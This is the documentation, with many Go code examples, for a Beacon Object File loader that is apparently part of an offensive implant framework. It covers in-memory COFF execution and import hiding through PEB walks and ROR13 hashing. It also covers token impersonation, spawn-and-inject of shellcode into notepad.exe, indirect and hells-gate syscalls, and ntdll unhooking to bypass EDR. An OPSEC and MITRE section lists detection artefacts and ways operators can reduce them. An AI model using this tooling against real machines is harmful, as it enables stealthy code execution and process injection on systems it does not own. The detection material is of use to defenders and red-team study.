BOF (Beacon Object File) loader
TL;DR
You have a .o file (compiled C object) — typically a public
BOF from TrustedSec / Outflank / FortyNorth (whoami, situational
awareness, file ops). You want to run it inside your implant
without spawning a child process. This package loads + executes
the COFF in memory.
| You want to… | Use | Notes |
|---|---|---|
| Run a BOF from disk | Run | Loads .o, parses COFF, resolves Beacon API, executes |
| Run a BOF from memory | RunBytes | When the BOF was decrypted in-process and never landed on disk |
| Pass arguments to the BOF (parsed via BeaconData*) | Config.Args | Variadic: the BOF's BeaconDataInt / BeaconDataPtr etc. consume them |
What this DOES achieve:
- Public BOFs (TrustedSec/CS-Situational-Awareness-BOF, TrustedSec/CS-Remote-OPs-BOF, Outflank/C2-Tool-Collection) run unmodified.
- Beacon API stubs implemented in Go — no Cobalt Strike needed on the operator side.
- Dynamic imports (KERNEL32, ADVAPI32, …) resolve through PEB + ROR13 hash, so the BOF's import table doesn't appear as plaintext strings.
What this DOES NOT achieve (out of the box):
- No ARM64. x86 and x64 are both supported (x86 via the cross-process loader under -tags=bof_x86_loader, see below).
- In-process by default: a crash in the BOF kills the implant. The default Execute path runs the BOF on the host's OS thread with no isolation. Opt in to SetSacrificialThread to spawn a dedicated thread with a VEH that turns BOF-mapping faults into a recoverable Go error.
- AMSI / ETW telemetry from the BOF still fires; pair with evasion/preset.Stealth before Run.
Primer
A BOF is a relocatable COFF (.o) object compiled by MSVC /
MinGW. It plays the same role as a Linux .o, but uses the COFF
layout with PE-style relocations rather than ELF. BOFs were popularised by Cobalt Strike's
inline-execute command — a tactical execution primitive that
runs a small piece of native code inside the implant's process
without spawning a fresh process or writing a PE to disk.
Use cases:
- Run small Windows-API-heavy snippets (token enum, share enum, share scan) that don't need a full PE infrastructure.
- Distribute compiled techniques as a .o artefact rather than a full implant.
- Compose with the implant's runtime: the BOF runs in the caller's address space, so it can interact with implant state directly.
How It Works
flowchart LR
INPUT[BOF .o bytes] --> PARSE[parse COFF<br>header + sections]
PARSE --> ALLOC[VirtualAlloc RW<br>copy every section w/ raw data]
ALLOC --> RELOC[apply relocations<br>ADDR64 / ADDR32NB / REL32]
RELOC --> IMP[resolve __imp_*<br>PEB walk + ROR13]
IMP --> FLIP[VirtualProtect<br>exec sections → RX]
FLIP --> SEH[RtlAddFunctionTable<br>register .pdata]
SEH --> SYM[resolve entry symbol<br>from COFF symtab]
SYM --> EXEC[call entry<br>inline OR sacrificial thread]
EXEC --> OUT[capture output<br>BeaconPrintf / BeaconOutput]
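The import-resolution step in the flowchart can be illustrated with a minimal sketch. It assumes the classic rotate-right-13 additive hash over the raw bytes of the name; the package's exact normalisation (case folding, terminator handling, module-name encoding) is not stated on this page, so the values below need not match its internal tables. `splitDollarImport` and `ror13` are hypothetical names used only for illustration.

```go
package main

import (
	"fmt"
	"math/bits"
	"strings"
)

// ror13 is the classic rotate-right-13 additive hash. This sketch hashes
// the bytes exactly as given (assumption: no case folding, no terminator).
func ror13(s string) uint32 {
	var h uint32
	for i := 0; i < len(s); i++ {
		h = bits.RotateLeft32(h, -13) // a negative count rotates right
		h += uint32(s[i])
	}
	return h
}

// splitDollarImport (hypothetical helper) splits a CS-style import symbol
// such as "__imp_KERNEL32$LoadLibraryA" into its module and function parts.
// Bare-form symbols without a '$' are reported as not matching.
func splitDollarImport(sym string) (module, function string, ok bool) {
	if !strings.HasPrefix(sym, "__imp_") {
		return "", "", false
	}
	rest := strings.TrimPrefix(sym, "__imp_")
	module, function, ok = strings.Cut(rest, "$")
	if !ok || module == "" || function == "" {
		return "", "", false
	}
	return module, function, true
}

func main() {
	mod, fn, ok := splitDollarImport("__imp_KERNEL32$LoadLibraryA")
	fmt.Println(mod, fn, ok)
	// A resolver would compare these hashes against hashes computed while
	// walking the loaded-module list and each module's export table.
	fmt.Printf("module=0x%08x function=0x%08x\n", ror13(mod), ror13(fn))
}
```

Matching on hashes rather than names is what keeps strings like LoadLibraryA out of the resolver's own data; the names still exist inside the BOF's symbol table until it is parsed.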
API → godoc
pkg.go.dev/github.com/oioio-space/maldev/runtime/bof is the authoritative
reference for every exported symbol. This page teaches the
concepts; the godoc is the specification.
Examples
Simple — load + execute
import (
"fmt"
"os"
"github.com/oioio-space/maldev/runtime/bof"
)
data, _ := os.ReadFile("whoami.o")
b, err := bof.Load(data)
if err != nil {
return
}
defer b.Close()
output, _ := b.Execute(nil)
fmt.Println(string(output))
Shorter — one-shot helpers (v0.156.0+)
The same three-line pattern (Load → Execute → Close) wrapped in one call. Five helpers cover the common cases; four are shown here:
// 1. One-shot from bytes (embedded via go:embed, decrypted in
// memory, ...). Load + Execute + Close in one line.
out, err := bof.RunFromBytes(coffBytes, nil)
// 2. One-shot from disk. The stealthopen.Opener parameter is
// optional — nil falls back to os.Open. Pass a *Stealth /
// *MultiStealth to read the file via NTFS Object-ID and
// bypass path-based EDR file hooks.
out, err := bof.RunFromFile(nil, "whoami.o", nil)
// 3. Crash-isolated one-shot. Identical to RunFromBytes but
// spawns the entry on a sacrificial OS thread with VEH-
// mediated fault catching. Required: a non-zero timeout.
out, err := bof.RunSafe(coffBytes, args, 5*time.Second)
// 4. Pack a list of strings without the NewArgs boilerplate.
args := bof.ArgsFromStrings("target.exe", "C:\\Windows\\System32")
out, err := bof.RunFromBytes(coffBytes, args)
Prefer the long form (Load + many Execute + Close) when the
same *BOF runs many times — the prepare pass amortises across
calls. Use the helpers for genuinely one-shot workloads.
Composed — chain multiple BOFs
for _, path := range []string{"whoami.o", "netstat.o", "tasklist.o"} {
data, err := os.ReadFile(path)
if err != nil {
continue
}
b, err := bof.Load(data)
if err != nil {
continue
}
out, _ := b.Execute(nil)
b.Close() // release this BOF's mapping before loading the next one
fmt.Printf("=== %s ===\n%s\n", path, out)
}
Advanced — pack arguments via Args
data, _ := os.ReadFile("parse_args.o")
b, _ := bof.Load(data)
defer b.Close()
a := bof.NewArgs()
a.AddInt(42)
a.AddString("hello-args")
out, _ := b.Execute(a.Pack())
fmt.Println(string(out))
The wire format is little-endian to match the Cobalt Strike
convention: TrustedSec COFFLoader, Outflank, etc. read length
prefixes via memcpy into a native int, which on x64 is a
little-endian load. Use AddInt / AddShort for fixed-width
ints, AddString for length-prefixed NUL-terminated strings, and
AddBytes for raw blobs.
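To make the layout concrete, here is a minimal sketch of a packer and the matching reader. It assumes 4-byte little-endian ints, 2-byte little-endian shorts, and strings stored as a 4-byte little-endian length (counting the trailing NUL) followed by the bytes and the NUL. The `packer`, `readInt`, and `readString` names are hypothetical, and whether `bof.Args` emits exactly these bytes (for example, with an extra total-size prefix) is not confirmed on this page.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// packer is a hypothetical stand-in for an argument builder.
type packer struct{ buf []byte }

func (p *packer) addInt(v int32) {
	p.buf = binary.LittleEndian.AppendUint32(p.buf, uint32(v))
}

func (p *packer) addShort(v int16) {
	p.buf = binary.LittleEndian.AppendUint16(p.buf, uint16(v))
}

// addString writes a length prefix that includes the NUL terminator.
func (p *packer) addString(s string) {
	p.buf = binary.LittleEndian.AppendUint32(p.buf, uint32(len(s)+1))
	p.buf = append(p.buf, s...)
	p.buf = append(p.buf, 0)
}

// readInt mirrors what a BeaconDataInt-style parser does: a native
// little-endian load followed by advancing the cursor.
func readInt(b []byte) (int32, []byte) {
	if len(b) < 4 {
		return 0, nil
	}
	return int32(binary.LittleEndian.Uint32(b)), b[4:]
}

// readString consumes one length-prefixed, NUL-terminated string.
func readString(b []byte) (string, []byte) {
	if len(b) < 4 {
		return "", nil
	}
	n := int(binary.LittleEndian.Uint32(b))
	if n < 1 || len(b) < 4+n {
		return "", nil
	}
	return string(b[4 : 4+n-1]), b[4+n:] // drop the NUL from the Go string
}

func main() {
	p := &packer{}
	p.addInt(42)
	p.addString("hello-args")
	fmt.Printf("% x\n", p.buf)

	v, rest := readInt(p.buf)
	s, _ := readString(rest)
	fmt.Println(v, s)
}
```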
Spec.Sacrificial + Spec.Timeout — crash isolation via Run (v0.156.0+)
The Run(ctx, Spec) façade now honours the same sacrificial-thread
contract as (*BOF).SetSacrificialThread:
res, err := bof.Run(ctx, bof.Spec{
Bytes: coffBytes,
Args: args,
Sacrificial: true,
Timeout: 30 * time.Second, // mandatory when Sacrificial is set
})
Sacrificial=true without a Timeout returns ErrSacrificialNoTimeout:
the package refuses to launch a thread with no wall-clock cap, because
an unbounded wait on the sacrificial thread is almost never
what an implant wants.
Architecture routing — x64 in-process, x86 cross-process (v0.155.0+)
bof.Run sniffs the COFF Machine field and dispatches: x64
runs in-process, x86 runs in a spawned SysWOW64\rundll32.exe
via the cross-process loader DLL embedded under the
bof_x86_loader build tag. Without the tag, x86 input returns
the sentinel bof.ErrCrossArchX86Unsupported so callers can
branch on architecture without parsing the file themselves.
import (
"context"
"errors"
"fmt"
"log"
"os"
"github.com/oioio-space/maldev/runtime/bof"
)
data, _ := os.ReadFile(bofPath)
res, err := bof.Run(context.Background(), bof.Spec{Bytes: data})
switch {
case err == nil:
// Auto-routed: x64 ran in-process, x86 ran in a WoW64 helper
// if the implant was built with `-tags=bof_x86_loader`.
fmt.Println(string(res.Output))
case errors.Is(err, bof.ErrCrossArchX86Unsupported):
// 32-bit .o detected and this implant was NOT compiled with
// `bof_x86_loader`. The build-tag gate keeps the implant
// small for missions that don't need x86 — rebuild with the
// tag (or fall back to a separate 32-bit implant) when an
// x86 BOF actually shows up in the corpus.
log.Printf("skip %s: rebuild with -tags=bof_x86_loader", bofPath)
default:
log.Printf("bof.Run failed: %v", err)
}
bof.DetectKind(data) is also exported if a caller wants to
classify the bytes without running them — handy for triage
tools that enumerate a public corpus before execution. See
runtime/bof/internal/x86loader/README.md for the x86 loader
architecture (Beacon API symbol surface, parent ↔ helper IPC,
threat model).
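For readers who want to see what sniffing the Machine field involves, the following sketch reads the first two bytes of the COFF file header. It is an illustration only: `sniffMachine` is a hypothetical helper, and the real `bof.DetectKind` may perform additional validation and returns its own kind type rather than a string.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

const (
	machineI386  = 0x014c // IMAGE_FILE_MACHINE_I386
	machineAMD64 = 0x8664 // IMAGE_FILE_MACHINE_AMD64
	coffHdrSize  = 20     // size of IMAGE_FILE_HEADER in bytes
)

var errTooShort = errors.New("input shorter than a COFF file header")

// sniffMachine classifies an object file by the little-endian Machine
// field stored at offset 0 of the COFF file header.
func sniffMachine(coff []byte) (string, error) {
	if len(coff) < coffHdrSize {
		return "", errTooShort
	}
	switch binary.LittleEndian.Uint16(coff[0:2]) {
	case machineAMD64:
		return "x64", nil
	case machineI386:
		return "x86", nil
	default:
		return "unknown", nil
	}
}

func main() {
	hdr := make([]byte, coffHdrSize)
	binary.LittleEndian.PutUint16(hdr, machineAMD64)
	kind, err := sniffMachine(hdr)
	fmt.Println(kind, err)
}
```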
Token impersonation + spawn-and-inject
The slice-1 surface lets a CS BOF impersonate, spawn a sacrificial target, and inject without any extra glue:
b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payloadShellcode) // optional, surfaced via BeaconGetCustomUserData
out, _ := b.Execute(nil)
// The BOF internally calls:
// BeaconUseToken(handle) → ImpersonateLoggedOnUser
// BeaconSpawnTemporaryProcess(...) → CreateProcess suspended
// BeaconInjectTemporaryProcess(...) → write + CreateRemoteThread + Resume
// BeaconRevertToken() → RevertToSelf
fmt.Println(string(out))
Execute pins the goroutine to its OS thread for the entire call, so the impersonation in step 1 is honoured by the syscalls the BOF issues in later steps.
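The pinning matters because impersonation is per-thread state, while the Go scheduler is otherwise free to move a goroutine between OS threads. A minimal sketch of the pattern, using only the standard library (`runPinned` is a hypothetical name, not the package's internal function):

```go
package main

import (
	"fmt"
	"runtime"
)

// runPinned wires the calling goroutine to its current OS thread for the
// duration of fn, so any thread-scoped state fn sets up (such as an
// impersonation token on Windows) stays visible to later calls inside fn.
func runPinned(fn func() string) string {
	runtime.LockOSThread()
	defer runtime.UnlockOSThread()
	return fn()
}

func main() {
	out := runPinned(func() string {
		// In the loader, the BOF entry point would be invoked here.
		return "ran on a pinned thread"
	})
	fmt.Println(out)
}
```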
Reuse — prepare once, run many (v0.153.0+)
A single *BOF can be Execute'd any number of times. The
expensive load work runs lazily on the first call and is cached
on the BOF; subsequent calls skip straight to the entry point.
Cost breakdown per call:
| Phase | First Execute | Subsequent Execute |
|---|---|---|
| Parse sections | ✓ | — |
| VirtualAlloc + section copy | ✓ | — |
| Resolve imports (PEB walk × N) | ✓ | — |
| Apply relocations | ✓ | — |
| VirtualProtect RW→RX | ✓ | — |
| Reset writable sections (if not persistent) | — | ✓ (cheap) |
| Call entry | ✓ | ✓ |
import (
"fmt"
"os"
"github.com/oioio-space/maldev/runtime/bof"
)
data, _ := os.ReadFile("whoami.o")
b, _ := bof.Load(data)
defer b.Close() // releases the cached RX mapping + .pdata unwind table
// First call: full parse + alloc + reloc + execute.
out1, _ := b.Execute(nil)
fmt.Println(string(out1))
// Second call: reuses the mapping, just re-runs the entry.
out2, _ := b.Execute(nil)
fmt.Println(string(out2))
Close() — release the cached mapping
b, _ := bof.Load(bytes)
out, _ := b.Execute(nil)
if err := b.Close(); err != nil {
log.Printf("Close: %v", err)
}
// After Close, Execute returns an error rather than crashing.
_, err := b.Execute(nil)
if err != nil {
// "runtime/bof: Execute on closed BOF"
}
Close is idempotent — multiple calls are safe. It does
two things in order: RtlDeleteFunctionTable (unregister the
.pdata unwind entries from Bundle E) then VirtualFree (drop
the RX mapping). A runtime.SetFinalizer in Load is a safety
net for callers who forget Close, but Go finalizer timing isn't
guaranteed: long-lived implants should Close explicitly to free
the mapping in a timely fashion.
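The idempotent-Close-plus-finalizer arrangement can be sketched with the standard library alone. This is an assumption about the general shape, not the package's code: `mapping`, `newMapping`, and the `released` counter are hypothetical, and the counter stands in for the RtlDeleteFunctionTable + VirtualFree pair.

```go
package main

import (
	"fmt"
	"runtime"
	"sync"
)

// mapping is a hypothetical stand-in for a loaded BOF image.
type mapping struct {
	once     sync.Once
	released int // counts how many times the teardown body actually ran
}

func newMapping() *mapping {
	m := &mapping{}
	// Safety net only: the garbage collector decides when (or whether)
	// this runs, so callers should still Close explicitly.
	runtime.SetFinalizer(m, func(m *mapping) { m.release() })
	return m
}

// release performs the teardown exactly once, no matter who calls it.
func (m *mapping) release() {
	m.once.Do(func() {
		// Real loader order: unregister unwind data, then free the memory.
		m.released++
	})
}

// Close is safe to call repeatedly; it also cancels the finalizer because
// an explicit Close makes the safety net unnecessary.
func (m *mapping) Close() error {
	runtime.SetFinalizer(m, nil)
	m.release()
	return nil
}

func main() {
	m := newMapping()
	_ = m.Close()
	_ = m.Close()
	fmt.Println("teardown ran", m.released, "time(s)")
}
```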
SetPersistent — stateful vs stateless BOFs (v0.153.0+)
SetPersistent controls whether writable sections (.data,
.bss, .rdata-with-writes) are restored between Execute
calls.
| Mode | Behaviour | Suits |
|---|---|---|
| false (default) | Each Execute restores writable sections to their initial bytes | Stateless BOFs: hello_beacon, parse_args, realworld_calls, most CS-SA-BOF corpus |
| true | Writable sections retain whatever the BOF wrote on the previous Execute | Stateful BOFs that intentionally cache cross-call state in .data: Fortra No-Consolation's LIBS_LOADED cache + handle-info struct |
Must be called before the first Execute — see
ErrAlreadyPrepared.
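The two modes boil down to a snapshot taken at prepare time and an optional restore before each later call. The sketch below models that with plain byte slices; `image`, `setPersistent`, `execute`, and `errAlreadyPrepared` are hypothetical stand-ins, and the real loader may snapshot per section or skip the snapshot entirely in persistent mode.

```go
package main

import (
	"errors"
	"fmt"
)

// errAlreadyPrepared stands in for the package's ErrAlreadyPrepared.
var errAlreadyPrepared = errors.New("already prepared")

// image models one writable section and its initial-bytes snapshot.
type image struct {
	data       []byte // live writable section, e.g. .data
	snapshot   []byte // copy of the initial bytes, taken on first execute
	persistent bool
	prepared   bool
}

// setPersistent is only allowed before the first execute.
func (im *image) setPersistent(p bool) error {
	if im.prepared {
		return errAlreadyPrepared
	}
	im.persistent = p
	return nil
}

// execute snapshots on the first call, and on later calls restores the
// initial bytes unless the image is persistent.
func (im *image) execute(entry func(data []byte)) {
	if !im.prepared {
		im.snapshot = append([]byte(nil), im.data...)
		im.prepared = true
	} else if !im.persistent {
		copy(im.data, im.snapshot)
	}
	entry(im.data)
}

func main() {
	bump := func(d []byte) { d[0]++ } // a "BOF" that counts its own calls

	stateless := &image{data: []byte{0}}
	stateless.execute(bump)
	stateless.execute(bump)

	stateful := &image{data: []byte{0}}
	_ = stateful.setPersistent(true)
	stateful.execute(bump)
	stateful.execute(bump)

	fmt.Println(stateless.data[0], stateful.data[0])
}
```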
Stateless (default) — every call sees fresh memory
b, _ := bof.Load(parseArgsBytes)
defer b.Close()
// Writable sections (.data, .bss) are restored to their initial
// bytes before each Execute. The BOF observes the same initial
// state on every call regardless of what previous calls wrote.
for _, arg := range []string{"alice", "bob", "carol"} {
a := bof.NewArgs(); a.AddString(arg)
out, _ := b.Execute(a.Pack())
fmt.Printf("%s → %s\n", arg, out)
}
Persistent — share state across Execute calls
b, _ := bof.Load(noConsolationBytes)
defer b.Close()
if err := b.SetPersistent(true); err != nil {
// SetPersistent before Execute always succeeds — error
// means the caller flipped it AFTER the first Execute,
// which is a contract violation (ErrAlreadyPrepared).
log.Fatal(err)
}
// Iteration 1: No-Consolation cold-loads all DLL dependencies,
// stores their handles in LIBS_LOADED (a .data global) via
// BeaconAddValue.
b.Execute(packArgs(pe1))
// Iteration 2: LIBS_LOADED is still warm — the BOF skips the
// LoadLibrary chain entirely.
b.Execute(packArgs(pe2))
SetPersistent after Execute → ErrAlreadyPrepared
b, _ := bof.Load(bytes)
defer b.Close()
b.Execute(nil) // runs prepare() — locks the persistence mode
if err := b.SetPersistent(true); errors.Is(err, bof.ErrAlreadyPrepared) {
// Expected: flipping the mode after prepare would leave
// the writable-section snapshots inconsistent. Decide at
// Load time which mode you want.
}
SetSacrificialThread — crash isolation (v0.154.0+)
By default a BOF runs on the same OS thread as the implant.
A wild pointer deref, stack overflow, or busted relocation
inside the BOF triggers a Windows SEH exception that
propagates through Go's runtime handler and ends in
TerminateProcess — the implant dies with the BOF.
SetSacrificialThread(timeout) enables crash isolation: the
BOF runs on a dedicated thread, a process-wide Vectored
Exception Handler intercepts faults whose address lies inside
the BOF mapping, redirects the faulting thread to an
ExitThread(1) stub, and the host Execute call returns a
clean Go error. The implant keeps running.
| Mode | When BOF AVs | Host process |
|---|---|---|
| Inline (default) | SEH → Go runtime → TerminateProcess | dies with the BOF |
| Sacrificial (SetSacrificialThread > 0) | VEH catches in-mapping fault → ExitThread → host gets error | survives |
Honest limitations
- Token impersonation does not cross threads by default; use SetExecuteAsToken to pin one. BeaconUseToken inside the BOF impersonates on the BOF's sacrificial thread; the host goroutine keeps its original token. To start the sacrificial thread under a specific identity, call (*BOF).SetExecuteAsToken(token) before Execute: the loader applies it via SetThreadToken between CreateThread(SUSPENDED) and ResumeThread. BOFs that rely on chained token state across calls still need to manage the chain themselves.
- Only faults inside the BOF mapping are caught. A BOF that passes a NULL pointer to kernel32!HeapAlloc takes the fault inside kernel32, outside the BOF range, and still terminates the implant. The VEH range check is on ExceptionAddress, not on the calling BOF.
- TerminateThread (used on timeout) leaks the thread's stack + any kernel objects it held. Windows-design limitation. Set timeouts generously; this is a last-resort kill, not a routine cancellation primitive.
Inline (default) — same thread, fastest
b, _ := bof.Load(coffBytes)
defer b.Close()
// SetSacrificialThread NOT called → inline path.
// If this BOF AVs, the implant dies.
out, _ := b.Execute(args)
Sacrificial — implant survives BOF crashes
b, _ := bof.Load(coffBytes)
defer b.Close()
// 5-second wall-clock cap. A zero duration leaves sacrificial mode off.
if err := b.SetSacrificialThread(5 * time.Second); err != nil {
log.Fatal(err) // ErrAlreadyPrepared if called after Execute
}
out, err := b.Execute(args)
switch {
case err == nil:
// Happy path — BOF returned normally.
fmt.Println(string(out))
case strings.Contains(err.Error(), "BOF crashed with exception"):
// BOF AVed / stack-overflowed / executed an illegal
// instruction inside its own mapping. Implant is still
// alive; err carries the exception code + faulting PC.
log.Printf("BOF crash isolated: %v", err)
case strings.Contains(err.Error(), "BOF timeout"):
// BOF ran longer than the timeout; the sacrificial
// thread was terminated. Output captured up to the
// timeout is in `out`.
log.Printf("BOF timeout, partial output: %s", out)
default:
// Other Execute error — usually a Load/prepare problem
// surfaced lazily on the first call.
log.Fatal(err)
}
Mixing knobs
Every knob below is independent — pick what fits your threat model and combine freely:
b, _ := bof.Load(realworldCallsBytes)
defer b.Close()
b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payload) // surfaced via BeaconGetCustomUserData
b.SetPersistent(false) // default — fresh .data per call
b.SetSacrificialThread(30 * time.Second) // implant survives BOF crashes
b.SetCaller(myIndirectCaller) // route BeaconInjectProcess via Nt*
b.SetExecuteAsToken(impersonationToken) // run the sacrificial thread under that token
for _, target := range targets {
out, err := b.Execute(packArgs(target))
if err != nil {
// Whatever the BOF does inside, this `err` is
// recoverable: bad BOF code, bad target, timeout.
// The implant doesn't die.
log.Printf("%s: %v", target, err)
continue
}
process(out)
}
SetCaller — route cross-process Beacon API via *wsyscall.Caller (v0.156.0+)
BeaconInjectProcess (and the spawn/inject combos that build on
it) drives three cross-process kernel32 calls: VirtualAllocEx,
WriteProcessMemory, CreateRemoteThread. By default these go
through the kernel32 wrappers; under userland-hooking EDR they
appear in the API trail. SetCaller redirects all three through
a *wsyscall.Caller so they route via NtAllocateVirtualMemory
/ NtWriteVirtualMemory / NtCreateThreadEx — direct, indirect,
hells-gate, or any combination the operator builds.
import (
"github.com/oioio-space/maldev/runtime/bof"
wsyscall "github.com/oioio-space/maldev/win/syscall"
)
// Indirect syscalls with a hells-gate-style SSN resolver.
caller := wsyscall.New(wsyscall.MethodIndirect, wsyscall.NewHellsGate())
defer caller.Close()
b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetCaller(caller)
_, _ = b.Execute(args)
nil — the default — keeps the kernel32 path. The Caller's
lifetime is operator-owned: BOF.Close does NOT call
caller.Close, so the same Caller can be shared across many
BOFs and inject sites. Matches the convention used across
inject.
Scope: only the BeaconInjectProcess primitives route through the Caller. Dynamic imports the BOF itself resolves (__imp_KERNEL32$VirtualAlloc, __imp_ADVAPI32$OpenProcessToken, __imp_NTDLL$Nt*, etc.) are patched into the BOF's import table at prepare time as direct function addresses (PEB walk + ROR13 export match). When the BOF later issues mov reg, [rip+slot]; call reg, it jumps straight to the resolved function and bypasses the operator's Caller entirely.

For full coverage of BOF Win32 calls, clean ntdll instead: the public-corpus audit (CS-SA, 37 BOFs, 652 imports) shows 55% are kernel32/advapi32/etc. wrappers and only 0.4% are Nt* direct, so a per-import shim would only intercept the 0.4%. The pragmatic answer is evasion/unhook: once ntdll's Nt* thunks are restored to their on-disk bytes, kernel32!VirtualAlloc → ntdll!NtAllocateVirtualMemory internally goes through a clean syscall stub, so no hook fires. Pair SetCaller with evasion/unhook for end-to-end bypass.

See .dev/refactor-2026/bundle-i-import-routing.md for the closed design discussion + corpus data.
SetExecuteAsToken — pin a token on the sacrificial thread (v0.156.0+)
Closes the historical limitation where BeaconUseToken inside
the BOF impersonated only on the sacrificial thread but
Execute started that thread under the host's primary token.
With SetExecuteAsToken, the loader applies SetThreadToken
between CreateThread(SUSPENDED) and ResumeThread — the BOF
entry runs under the supplied identity from instruction zero.
Requires SeImpersonatePrivilege (admin / service contexts by
default) or a token the caller is permitted to assign.
import (
"time"
"github.com/oioio-space/maldev/runtime/bof"
"golang.org/x/sys/windows"
)
// Duplicate the current process's primary token to an
// impersonation-grade copy with TOKEN_IMPERSONATE rights.
var primary windows.Token
_ = windows.OpenProcessToken(windows.CurrentProcess(),
windows.TOKEN_DUPLICATE|windows.TOKEN_QUERY, &primary)
defer windows.CloseHandle(windows.Handle(primary))
var dup windows.Token
_ = windows.DuplicateTokenEx(primary,
windows.TOKEN_IMPERSONATE|windows.TOKEN_QUERY,
nil,
windows.SecurityImpersonation, windows.TokenImpersonation,
&dup)
defer windows.CloseHandle(windows.Handle(dup))
b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetSacrificialThread(5 * time.Second) // required — token only applies on the sacrificial path
b.SetExecuteAsToken(dup)
_, _ = b.Execute(args)
Zero — the default — keeps the host's primary token. Has no
effect on inline Execute (the host's own token always
applies on that path).
OPSEC & Detection
| Artefact | Where defenders look |
|---|---|
| VirtualAlloc(RW) → VirtualProtect(RX) cycle on a single mapping (the loader pattern) | Behavioural EDR: a generic reflective-loader signal even with the RW→RX flip used in place of RWX. The two-syscall cadence is itself a tell |
| MEM_TOP_DOWN allocation with IMAGE_SCN_MEM_EXECUTE content not backed by a loaded module | ETW Microsoft-Windows-Threat-Intelligence (TI events) |
| BOF entry-point execution from non-image memory | Defender for Endpoint MsSense |
| RtlAddFunctionTable for a non-image RUNTIME_FUNCTION array (Bundle E) | Niche; few products inspect, but kernel ETW captures the kernel-side registration |
| syscall.NewCallback thunk pages (≈ 28 × 4 KB at first Load) | Small VAD entries with characteristic prologue bytes, the same signature any Go program with native callbacks emits |
D3FEND counters:
- D3-PA — execute-from-allocation telemetry (RX-after-flip still trips the more thorough EDRs).
- D3-FCA — YARA on the loaded bytes.
Hardening for the operator (already in the loader by default):
- RW → RX flip via VirtualProtect after relocations land (loader behaviour since v0.151; no RWX is ever exposed).
- MEM_TOP_DOWN placement (high-address bias reduces collision with the host's heap + the most naive low-RVA scanner rules).
- Encrypt the BOF at rest via crypto; decrypt + load + immediately re-encrypt the source buffer.
- Pair with evasion/sleepmask for cleartext-at-rest mitigation.
- Bypass kernel32 userland hooks on the cross-process Beacon API via (*BOF).SetCaller.
MITRE ATT&CK
| T-ID | Name | Sub-coverage | D3FEND counter |
|---|---|---|---|
| T1059 | Command and Scripting Interpreter | partial — in-memory native code execution | D3-PA |
| T1620 | Reflective Code Loading | full — COFF reflective load | D3-FCA, D3-PA |
Limitations
- Execute is amortised, not free (v0.153+). The first call on a *BOF runs the full loader pass (parse + VirtualAlloc + relocations + RW→RX flip + .pdata registration). Subsequent calls reuse the mapping, which is ideal for callers like runtime/pe that load one .o and run it many times. Caller responsibility: call Close() explicitly when done. The runtime.SetFinalizer safety net in Load will eventually RtlDeleteFunctionTable + VirtualFree, but Go finalizer timing isn't guaranteed; long-lived implants leaking RX mappings is a real liability.
- Default Execute is stateless. Writable sections (.data, .bss, .rdata-with-writes) are restored to their initial bytes between Execute calls. BOFs that intentionally cache state in their .data (No-Consolation's LIBS_LOADED cache) need SetPersistent(true) before the first Execute.
- Beacon-API surface: full 28-symbol set (slice 1, v0.151+). All beacon.h groups are wired:
  - Data parsing: BeaconDataParse / DataInt / DataShort / DataLength / DataExtract.
  - Output / format: BeaconPrintf + BeaconFormatPrintf (format string forwarded verbatim; varargs caveat below), BeaconOutput, BeaconFormatAlloc / Reset / Free / Append / Int / ToString, BeaconErrorD / ErrorDD / ErrorNA.
  - Tokens: BeaconUseToken (ImpersonateLoggedOnUser) / BeaconRevertToken (RevertToSelf). Execute pins the goroutine to its OS thread for the BOF call so the impersonation is honoured by subsequent Win32 calls; we RevertToSelf on Execute exit as a safety net.
  - Injection: BeaconInjectProcess (VirtualAllocEx + WriteProcessMemory + CreateRemoteThread on a host handle), BeaconSpawnTemporaryProcess (CreateProcess suspended on the configured SpawnTo, rundll32.exe by default), BeaconInjectTemporaryProcess (spawn + inject + resume, teardown on failure), BeaconCleanupProcess (terminate + close).
  - Helpers: BeaconIsAdmin, BeaconGetCustomUserData (blob configured via (*BOF).SetUserData), toWideChar (UTF-8 → UTF-16LE, NUL-terminated).
  - Key-value store: BeaconAddValue / BeaconGetValue / BeaconRemoveValue. Scope is the single Execute call; cross-Run state must go through the implant.

  Any unknown __imp_Beacon* import still fails at relocation time with unresolved external symbol __imp_BeaconXxx, which is loud and traceable rather than silent NULL-patching.
- BeaconFormatAlloc buffers live one Execute call. Slices produced by BeaconFormatAlloc are held on the *BOF (per-instance map, not a process-global). BeaconFormatFree drops the entry; whatever the BOF forgets to free is reclaimed automatically when the next Execute starts and on Close(). A BOF that crashes mid-call no longer leaks its format buffer for the process lifetime.
- SEH unwind via RtlAddFunctionTable. Every COFF with a non-empty .pdata section gets its RUNTIME_FUNCTION entries registered during prepare so the OS unwinder can resolve frames inside the BOF mapping. Without this, a BOF that raises a structured exception (C++ throw, compiler-emitted bounds check, RaiseException) would abort during the unwind walk, because the unwinder could not find a function entry for the BOF's PC. Registration is silent on failure (malformed .pdata → the BOF still runs, just without SEH support). Close calls RtlDeleteFunctionTable before VirtualFree to avoid leaving dangling unwind context.
- Cross-process Beacon API routes via optional *wsyscall.Caller. BeaconInjectProcess and the spawn/inject combos use VirtualAllocEx + WriteProcessMemory + CreateRemoteThread by default. Operators that need to bypass userland hooks on these kernel32 surfaces call (*BOF).SetCaller with any *wsyscall.Caller (direct / indirect / indirect-asm / hells-gate). The helpers (beaconRemoteAlloc, beaconRemoteWrite, beaconRemoteCreateThread) then route through NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx. A nil Caller keeps the kernel32 path, matching the convention used across inject.
- Pointer-safety probes on %s / Beacon string reads. BeaconPrintf("%s", p) (and any callback that dereferences a BOF-supplied char* / wchar_t*) routes through win/api.CStringFromPtr and win/api.WStringFromPtr. Both call VirtualQuery once to clamp the walk to the committed region containing the pointer, so a malformed, freed, or guard-page-crossing pointer returns "" instead of faulting the host. The wide-string heuristic in expandCFormat shares the same probe via SafeRegionBytes.
